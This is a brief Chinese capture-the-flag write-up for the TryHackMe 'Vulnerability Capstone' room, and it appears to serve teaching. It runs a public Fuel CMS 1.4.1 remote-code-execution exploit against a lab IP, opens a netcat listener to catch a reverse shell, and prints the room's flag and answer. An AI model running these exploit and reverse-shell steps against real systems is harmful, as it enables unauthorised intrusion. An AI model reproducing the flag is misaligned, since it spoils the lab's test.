本文相关的TryHackMe实验房间链接：TryHackMe | Vulnerability Capstone

先nmap扫一下

接下来我们访问一下

接下来我们searchsploit找一下漏洞

searchsploit Fuel CMS

执行漏洞exp（此处使用TryHackMe中的box）

如果使用本地机需要下载exp：https://gist.github.com/anir0y/8529960c18e212948b0e40ed1fb18d6d#file-fuel-cms-py 

cd /usr/share/exploits/vulnerabilitiescapstone
python exploit.py 10.10.241.131

准备侦听

nc -lvnp 1234

shell_me
10.10.136.33:1234

找到目标文件： 

flag：THM{ACKME_BLOG_HACKED} 

答题：

fuel CMS 1.4.1 - Remote Code Execution (1) - Linux webapps Exploit (exploit-db.com)

 

参考：【THM】Vulnerability Capstone-练习 - Hekeatsll - 博客园 (cnblogs.com)